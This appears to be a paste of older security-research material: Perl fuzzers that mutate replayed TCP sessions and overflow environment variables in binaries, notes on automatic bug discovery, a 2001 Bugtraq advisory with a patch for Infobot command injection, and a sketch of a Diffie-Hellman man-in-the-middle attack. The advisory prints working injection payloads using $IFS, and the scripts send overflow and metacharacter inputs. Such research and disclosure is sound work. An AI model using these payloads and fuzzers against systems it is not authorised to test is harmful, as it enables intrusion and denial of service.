- foreach $k (0..$#words)
- {
- my @words_temp = @words;
- $words_temp[$k] = $words_temp[$k] ."A"x($size - length($words_temp[$k]));
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- }
- }
- return @sessions;
- }
- # 5bb functions
- sub try_5bb
- {
- my @sessions = &get_5bb_sessions;
- &send_std_session(2, \@sessions);
- }
- sub get_5bb_sessions
- {
- my(@sessions, $i, $j, $k, $l, %nums);
- $i = 0;
- foreach $j (0..$#send)
- {
- my @words = split /$sepregex+/, $send[$j];
- foreach $k (0..$#words)
- {
- if($words[$k] =~ /^\-?[0-9]+$/)
- {
- $nums{$words[$k]} = 1;
- }
- }
- }
- foreach $j (0..$#send)
- {
- my @words = split /$sepregex+/, $send[$j];
- foreach $k (0..$#words)
- {
- if($words[$k] =~ /^\-?[0-9]+$/)
- {
- my @words_temp = @words;
- foreach $l (keys(%nums))
- {
- if($words_temp[$k] == $l) { next }
- $words_temp[$k] = $l;
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- }
- }
- }
- }
- return @sessions;
- }
- # 5bc functions
- sub try_5bc
- {
- my @sessions = &get_5bc_sessions;
- &send_std_session(1, \@sessions);
- }
- sub get_5bc_sessions
- {
- my(@sessions, $i, $j, $k);
- $i = 0;
- foreach $j (0..$#send)
- {
- my @words = split/$sepregex+/, $send[$j];
- foreach $k (0..$#words)
- {
- if($words[$k] =~ /^\-?[0-9]+$/)
- {
- my @words_temp = @words;
- # first replace with 0
- if($words[$k] != 0)
- {
- $words_temp[$k] = 0;
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- }
- # then with the inverse of the number or -1 if it's 0.
- ($words_temp[$k] ? ($words_temp[$k] *= -1) : ($words_temp[$k] = -1));
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- }
- }
- }
- return @sessions;
- }
- # 5bd functions
- sub try_5bd
- {
- my $i;
- my @sessions = &get_5bd_sessions;
- # implementation isn't the best, but it outlines what needs to be done.
- foreach $i (0..$#sessions)
- {
- my(@temp_send, @temp_sessions);
- @{$temp_send[0]} = @send;
- @{$temp_sessions[0]} = @{$sessions[$i]};
- if(!fork)
- {
- &send_std_session(0, \@temp_sessions);
- exit;
- }
- &send_std_session(1, \@temp_send);
- # wait until child process is reaped
- while(wait != -1) { wait }
- }
- }
- sub get_5bd_sessions
- {
- my(@sessions, $i, $l, $combos);
- $i = 0;
- $l = newcombo main(@send);
- while(@{$sessions[$i++]} = $l->nextcombo) { }
- return @sessions;
- }
- # 5be functions
- sub try_5be
- {
- my $i;
- my @sessions = &get_5be_sessions;
- &send_std_session(1, \@sessions);
- }
- sub get_5be_sessions
- {
- my(@sessions, $i, $l, $combos);
- $i = 0;
- $l = newcombo main(@send);
- while(@{$sessions[$i++]} = $l->nextcombo) { }
- return @sessions;
- }
- # 5bf functions
- sub try_5bf
- {
- my @sessions = &get_5bf_sessions;
- &send_std_session(2, \@sessions);
- }
- sub get_5bf_sessions
- {
- my(@sessions, $i, $j, $k);
- $i = 0;
- foreach $j (0..$#send)
- {
- my @words = split /$sepregex+/, $send[$j];
- foreach $k (0..$#words)
- {
- my @words_temp = @words;
- # lets try adding the vuln checking string to both the front and end
- $words_temp[$k] = $words[$k] .$vulnchkstr;
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- $words_temp[$k] = $vulnchkstr. $words[$k];
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- }
- }
- return @sessions;
- }
- # 5bg functions
- sub try_5bg
- {
- my $temp_tout = $recvtout;
- my($sessions, $recvs) = &get_5bg_sessions;
- &send_std_session(1, $sessions, $recvs);
- }
- sub get_5bg_sessions
- {
- my(@sessions, @recvs, $i, $j, $k);
- $i = 0;
- foreach $j (0..$#send)
- {
- if(!$send[$j]) { next }
- $k = 0;
- for(0..$#send)
- {
- if($_ == $j)
- {
- for(0..$_5bg_tries)
- {
- $sessions[$i][$k] = $send[$j];
- $recvs[$i][$k++] = $recv[$j];
- }
- }
- else
- {
- $sessions[$i][$k] = $send[$_];
- $recvs[$i][$k++] = $recv[$_];
- }
- }
- $i++;
- }
- return(\@sessions, \@recvs);
- }
- # 5bh functions
- sub try_5bh
- {
- my @sessions = &get_5bh_sessions;
- &send_std_session(2, \@sessions);
- }
- sub get_5bh_sessions
- {
- my(@sessions, $i, $j, $k);
- $i = 0;
- foreach $j (0..$#send)
- {
- my @words = split/$sepregex+/, $send[$j];
- foreach $k (0..$#words)
- {
- if($words[$k] =~ /^\-?[0-9]+$/ && $words[$k] != 0)
- {
- my @words_temp = @words;
- # then with the inverse of the number or -1 if it's 0.
- $words_temp[$k] *= -1;
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- }
- }
- }
- return @sessions;
- }
- # 5bi functions
- sub try_5bi
- {
- my @sessions = &get_5bi_sessions;
- &send_std_session(2, \@sessions);
- }
- sub get_5bi_sessions
- {
- my(@sessions, $i, $j, $k);
- $i = 0;
- foreach $j (0..$#send)
- {
- my @words = split /$sepregex+/, $send[$j];
- foreach $k (0..$#words)
- {
- my @words_temp = @words;
- $words_temp[$k] = &urlescape($words[$k]);
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- # lets try adding the vuln checking string to both the front and end
- $words_temp[$k] = &urlescape($words[$k] .$vulnchkstr);
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- $words_temp[$k] = &urlescape($vulnchkstr. $words[$k]);
- @{$sessions[$i]} = @send;
- $sessions[$i++][$j] = join $seperator, @words_temp;
- }
- }
- return @sessions;
- }
- # general functionality
- sub connectto
- {
- my $t = new Net::Telnet(
- Host => $host,
- Port => $port,
- Telnetmode => 0,
- Timeout => $recvtout);
- $t->errmode('return');
- $t->open();
- return $t;
- }
- # 5b sending functions
- # errlevel == 1, check for disconnect
- # errlevel == 2, check for different responses
- # search == 1, check only the first word in the string
- # search == -1, search the full recv string
- sub send_std_session
- {
- my $errlevel = $_[0];
- my @sessions = @{$_[1]};
- my @recvs = @{$_[2]};
- my($i, $j, @responses);
- foreach $i (0..$#sessions)
- {
- my $err = 0;
- my $t = &connectto;
- my @temp_recvs = defined($_[2]) ? @{$recvs[$i]} : @recv;
- foreach $j (0..$#temp_recvs)
- {
- if($err == 1) { next }
- # wait for receive before flushing input.
- ($sessions[$i][$j]) and $t->print($sessions[$i][$j]);
- my $line = $t->getline;
- while($t->getline) { }
- $line =~ s/[\r\n]+$//g; $line =~ s/[\r\n]+/\\n/g;
- if($temp_recvs[$j] =~ /^([^$sepregex]+)/)
- {
- my $search = &escaperegex($1);
- $search =~ s/[\r\n]+/\\n/g;
- if(!defined($line) && ($errlevel == 1 || $verbose > 1))
- {
- print "------[ ! connection closed, sent: $sessions[$i][$j], ".
- "expect: $1, recv: $line\n";
- &printsessverbose(\@{$sessions[$i]}, \@{$responses[$i]})
- if(($errlevel == 1 && $verbose > 0) ||
- ($errlevel == 2 && $verbose > 2));
- $err = 1;
- }
- if(defined($line) &&
- ($line !~ /$search/ && ($errlevel == 2 || $verbose > 1)))
- {
- print "------[ ! sent: $sessions[$i][$j], expect: $1, recv: $line\n";
- &printsessverbose(\@{$sessions[$i]}, \@{$responses[$i]})
- if(($errlevel == 2 && $verbose > 0) ||
- ($errlevel == 1 && $verbose > 2));
- }
- $responses[$i][$j] = $line;
- }
- }
- $t->close();
- }
- }
- # misc functions
- sub host2ip
- {
- return join(".", unpack("C4", (gethostbyname($_[0]))[4]));
- }
- sub escaperegex
- {
- my $search = $_[0];
- $search =~ s/([^0-9a-zA-Z])/\\$1/g;
- return $search;
- }
- sub urlescape
- {
- my $url = $_[0];
- $url =~ s/(.)/sprintf("%%%x", ord($1))/eg;
- return $url;
- }
- sub printsessverbose
- {
- my @sessions = @{$_[0]};
- my @responses = @{$_[1]};
- my $k;
- foreach $k (0..$#responses)
- {
- ($sessions[$k]) and print "--[ send $k: $sessions[$k]\n";
- ($responses[$k]) and print "--[ recv $k: $responses[$k]\n";
- }
- }
- # combinations oop functions
- sub newcombo
- {
- $class = shift;
- $list = [ @_ ];
- bless [$list, [0 .. $#$list]], $class;
- }
- sub nextcombo
- {
- $self = shift;
- $list = $self->[0];
- $tot = $self->[1];
- return unless @$tot;
- @next = @$tot;
- @end = pop @next;
- while (@next && $next[-1] > $end[-1])
- {
- push(@end, pop(@next));
- }
- if (defined($extra = pop(@next)))
- {
- ($place) = grep $extra < $end[$_], 0 .. $#end;
- ($extra, $end[$place]) = ($end[$place], $extra);
- $self->[1] = [@next, $extra, @end];
- }
- else
- {
- $self->[1] = [];
- }
- return @$list[@$tot];
- }
- 5b. Automatic Exploit Discovery -
- 1. Identify classifications of common software bugs as specifically as possible
- 2. Name a theoretical example of each bug, ideally in "ASCII over TCP" protocols
- 3. Describe an algorithm for automating remote detection of those bugs in client-server software. Assume that you have a working copy of server software, captured images of valid transactions and reasonable hardware. Ideal situations will need no knowledge of the protocol grammar beyond word and seperator characters.
- The Answers -
- a1. Failure to validate input buffer lengths
- a2. In POP3 authentication, username input may not be length-validated.
- a3. Most buffer overflows can be detected in ASCII protocols by replaying a captured session repeatedly, replacing one word each time with a 4097 character word.
- - check for disconnect
- b1. Fencepost a.k.a. Off by one counting errors
- b2. In POP3 message retrieval, there could be an off-by-one error in the number of retreivable messages.
- b3. Off-by-one errors can be detected by replaying a captured session with each numeric client-side word replaced with each previously seen numeric server words.
- - check for different response
- c1. Null Pointers, Dereferencing, Page Fault
- c2. In POP3, deleting or retreiving message 0 without checking, or executing commands out of order might cause null pointers to be used.
- c3. Null Pointers can be detected by replaying a captured session and executing the commands in a different order, or by replacing numerical words with 0 or negative numbers.
- - check for disconnect
- d1. Race Conditions
- d2. In POP3 race conditions may occur when mail is received or removed and counters are modified while being read or written to by other connected clients.
- d3. Race Conditions can be detected by replaying a captured session in a control process and executing other captured sessions with the commands put in various orders at the same time and looking for unexpected results. (e.g., run your control process without a second test process, then re-run with the test process running concurrently and check for deviations with the results).
- - check for deviations
- e1. Using uninitialized variables/memory
- e2. In POP3 validation of protocol order may not be checked, sending your password before username or executing commands out of order may cause uninitialized variables to be used.
- e3. Using uninitialized variables/memory can be detected by replaying a captured session with the client-side commands put in different order.
- - check for disconnect
- f1. Poorly implemented input matching
- f2. In HTTP, failure to check filenames that might attempt a directory traversal ".." or unexpected characters or strings passed to cgi applications.
- f3. Poorly implemented input matching can be detected by replaying a captured session with each word replaced with unexpected input characters depending on the protocol. (e.g. "..", file globbing characters -- "*, ?, +, [, ]", regex matching characters -- "+, *, ?, ^, $, (, ), {, }, [, ]", format string vuln characters -- "%s, %d, %p, %n, etc", common exec exploitation characters -- ";, <, >, |, ", '", null and non-ascii characters)
- - check for different response
- g1. Memory leaks (not freeing dynamically allocated memory)
- g2. In POP3, if memory for each message is not freed and numerous messages are read, it could cause denial of service.
- g3. Memory leaks can be detected by replaying a captured session and repeating a command numerous times while checking latency and availability.
- - check for latency or disconnect
- h1. Mixing signed and unsigned number variables
- h2. In HTTP, sending an negative number as the byte count (Content-Length) for a POST, assuming the httpd uses a signed variable with the byte count. (which would check out fine if the program checks to see if the content-length is < the bytes read) And in turn if it set the length variable for the POST buffer to the negative number, it could cause the processing function to read more data than is supplied.
- h3. Improper mixing of signed and unsigned number variables can be detected by replaying a captured session with all numerical words inverted to their negative equivalent, or positive equivalent if negative.
- - check for different response
- i1. Failure to resolve escapes before validating
- i2. In HTTP, failure to resolve unicode, specialchars, and other http escaped characters before input matching.
- i3. Failure to resolve escapes before validating can be detected by replaying a normal session as well as all input matching sessions with all characters escaped.
- - check for different response
- #!/usr/bin/perl
- # testenvs.pl - by CommPort5 [@LucidX.com]
- # attempts to find and overflow environment variables
- # in a binary program
- $SIG{INT} = \&data;
- $SIG{'TSTP'} = \&data;
- die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;
- @ignore = split(/\s+/,
- "TERM USER TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC _GLOBAL_OFFSET_TABLE_ --");
- print "testenvs.pl :: tests environment variables in binary programs for buffer overflows\n";
- open(BINARY, shift) || die "Can't open file: $!\n";
- @read = <BINARY>;
- close(BINARY);
- $i = 0;
- $tokens = @read;
- while ($read[$i]) {
- @tmpread = split(chr(0), $read[$i]);
- $tokens = @tmpread;
- $j = -1;
- while ($j < $tokens) {
- $j++;
- $k = 0;
- while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
- if ($k + 1 == length($tmpread[$j])) {
- $m = 0;
- @s = @ignore;
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j]) {
- $m++;
- }
- $l++;
- }
- @s = split(/,/, $result);
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
- $m++;
- }
- $l++;
- }
- if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
- substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
- if (!$result) {
- $result = $tmpread[$j];
- }
- else {
- $result = "$result, $tmpread[$j]";
- }
- }
- }
- $k++;
- }
- }
- $i++;
- }
- &data;
- sub data {
- if ($result) {
- foreach (split(/,\s*/, $result)) {
- $ENV{$_} = "A" x 2500;
- }
- exec("$ARGV[0] " . "A" x 2500);
- }
- else {
- print "no typical ENV variables found.\nattempt arguement overflows manually [and environment, if any].\n";
- }
- }
- sub isvalid {
- $char = substr(shift, 0, 1);
- if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
- return 1;
- }
- return 0;
- }
- #!/usr/bin/perl
- # getenvs.pl - by CommPort5 [@LucidX.com]
- # this is a hacked up and nice version of v9's getenv program
- # so credits go to him
- $SIG{INT} = \&data;
- $SIG{'TSTP'} = \&data;
- die "usage: $0 < /path/to/binary >\n" unless @ARGV == 1;
- #@ignore = split(/\s+/,
- #"TTOU TTIN TSTP STOP CONT CHLD STKFLT ALRM PIPE USR2 SEGV USR1 KILL FPE BUS IOT ABRT TRAP ILL QUIT INT HUP _DYNAMIC
- #_GLOBAL_OFFSET_TABLE_ --");
- print "getenvs.pl :: finds environment variables in binary programs\n";
- &readbinary(@ARGV);
- &data;
- exit(0);
- sub readbinary {
- open(BINARY, shift) || die "Can't open file: $!\n";
- @read = <BINARY>;
- close(BINARY);
- $i = 0;
- $tokens = @read;
- while ($read[$i]) {
- @tmpread = split(chr(0), $read[$i]);
- $tokens = @tmpread;
- $j = -1;
- while ($j < $tokens) {
- $j++;
- $k = 0;
- while (isvalid(substr($tmpread[$j], $k, 1)) && length($tmpread[$j]) > 1) {
- if ($k + 1 == length($tmpread[$j])) {
- $m = 0;
- @s = @ignore;
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j]) {
- $m++;
- }
- $l++;
- }
- @s = split(/,/, $result);
- $l = 0;
- while ($s[$l]) {
- if ($s[$l] eq $tmpread[$j] || $s[$l] eq " $tmpread[$j]") {
- $m++;
- }
- $l++;
- }
- if (!$m && substr($tmpread[$j], 0, 3) ne "SIG" && substr($tmpread[$j], 0, 2) ne "__" &&
- substr($tmpread[$j], length($tmpread[$j]) - 2, 2) ne "__") {
- if (!$result) {
- $result = $tmpread[$j];
- }
- else {
- $result = "$result, $tmpread[$j]";
- }
- }
- }
- $k++;
- }
- }
- $i++;
- }
- }
- sub data {
- if ($result) {
- print "possible ENV variables: $result\n";
- }
- else {
- print "no typical ENV variables found.\n";
- }
- }
- sub isvalid {
- $char = substr(shift, 0, 1);
- if (ord($char) > 64 && ord($char) < 91 || ord($char) > 47 && ord($char) < 58 || ord($char) == 45 || ord($char) == 95) {
- return 1;
- }
- return 0;
- }
- Date: Tue, 6 Feb 2001 22:53:27 -0800
- From: "samy [CommPort5]" <CommPort5@LUCIDX.COM>
- Subject: Infobot 0.44.5.3/below remotely vulnerable (also in FreeBSD ports
- To: BUGTRAQ@SECURITYFOCUS.COM
- Advisory: Infobot 0.44.5.3 and below vulnerability [Hack-X]
- This version and versions from before were also released into the
- FreeBSD ports tree.
- Currently there is no patched version even though I emailed the author
- over a month ago about this and emailed the development list over a
- week, and them saying it would be fixed immidiately although still
- isn't. A patch follows below.
- Author: samy [CommPort5@LucidX.com]
- Special thanks to zsvx for helping find this problem and testing it on
- multiple infobots.
- I. Background
- Infobot is an IRC bot written in perl for information retrieval and
- storage along with channel management and many other useful tasks.
- II. Problem Description
- Infobot has a 'fortran math' section that's used with the 'calc'
- command via IRC. If someone were to message (privately or in a
- channel) with 'calc 1+1' (assuming fortran math is enabled in the
- config file), the bot would return '2'. The problem is the way
- this function works. It uses open() to run `bc`, which does the
- actual math.
- The original code was
- open(P, "echo $parm|bc 2>&1 |");
- which allowed someone to use |'s to escape the echo and run anything
- through open(). Although, whitespaces are eliminated from user-input
- with fortran math so this eliminates a lot of possibilities.
- They soon fixed this bug with
- open(P, "echo '$parm'|bc 2>&1 |");
- This only opened up another hole. A user is now able to escape the
- echo by using single-quotes and semicolons, but they are stlil
- unable to use whitespaces. To get around the whitespaces, the user
- is able to use a local variable set in the terminal. $IFS is, by
- default on almost all systems, a newline character or whitespace.
- Either of these would work, so in code you would be able to replace
- a whitespace with $IFS.
- III. Impact
- Any malicious user would be able to run arbitrary files writable by
- the user running infobot. They would also be able to recieve
- information or write, since infobot automatically replies the data
- the open() sent. A user would be able to easily check the operating
- system and gain other information like so:
- calc ';uname$IFS"-a";'
- or in older versions:
- calc |uname$IFS"-a"|
- They would also be able to install arbitrary files and execute them.
- IV. Workaround
- Disable fortran math in the infobot configuration file and restart
- the infobot.
- V. Solution
- The best solution would be to parse out certain characters from the
- user's input. You can do this by adding a line to src/Math.pl in
- the infobot's main directory. You will see on line 40:
- $parm =~ s/\s//g;
- After this line, create a new line and insert this:
- $parm =~ s/[\|;']//g;
- Save the file (src/Math.pl) and restart infobot.
- --
- samy -- (877) 898-1424 -- CommPort5@LucidX.com
- LucidX.com / pdump.org / LA.pm.org
- Preventing Man-in-the-Middle Attacks with
- Diffie-Hellman Key Exchange and Authentication
- Samy Kamkar - samy@samy.pl - August 4, 2009
- h = hash(plaintext, salt) e = encrypt(plaintext, key) d = decrypt(ciphertext, key)
- MAN IN THE MIDDLE ATTACK ON STANDARD AUTHENTICATION METHOD
- Alice Mallory Bob
- password = 54321 password = 54321
- key = zzz alice key = zzz (DH MITMA) key = yyy
- bob key = yyy (DH MITMA)
- e(password,key) = passhash e(password,key) = passhash
- e(54321,zzz) = "deadbeef" e(54321,yyy) = "badcoded"
- SEND: "deadbeef" d(deadbeef,zzz) = 54321
- e(54321,yyy) = "badcoded"
- SEND->Bob: "badcoded"
- RECV: "badcoded" matches
- MITMA successful :(
- NEW AUTHENTICATION METHOD
- Alice Bob
- password = 54321 password = 54321
- key = zzz key = zzz
- h(54321,key) = "blahwoot" h(54321,key) = "blahwoot"
- SEND: "blahwoot
- RECV: "blahwoot" matches
- h(ok,password) = GOOD! h(ok,password) = GOOD!
- h("ok",54321) = "awesome" h("ok",54321) = "awesome"
- SEND: "awesome"
- RECV: "awesome" matches
- pubkey now saved for future use in known_hosts
- DH + authentication verified
- MAN IN THE MIDDLE ATTACK ON NEW METHOD
- Alice Mallory Bob
- password = 54321 password = 54321
- key = zzz alice key = zzz (DH MITMA) key = yyy
- bob key = yyy (DH MITMA)
- h(password,key) = passhash h(password,key) = passhash
- h(54321,zzz) = "blahwoot" h(54321,yyy) = "wtfmate"
- SEND: "blahwoot" can't reverse hash to get pass!
- can't send h(ok,password) RECV: "blahwoot" != "wtfmate"
- doesn't know password SEND: BAD!
- RECV: BAD!
- pubkey NOT saved in known_hosts
- both sides fail authentication
Add Comment
Please, Sign In to add comment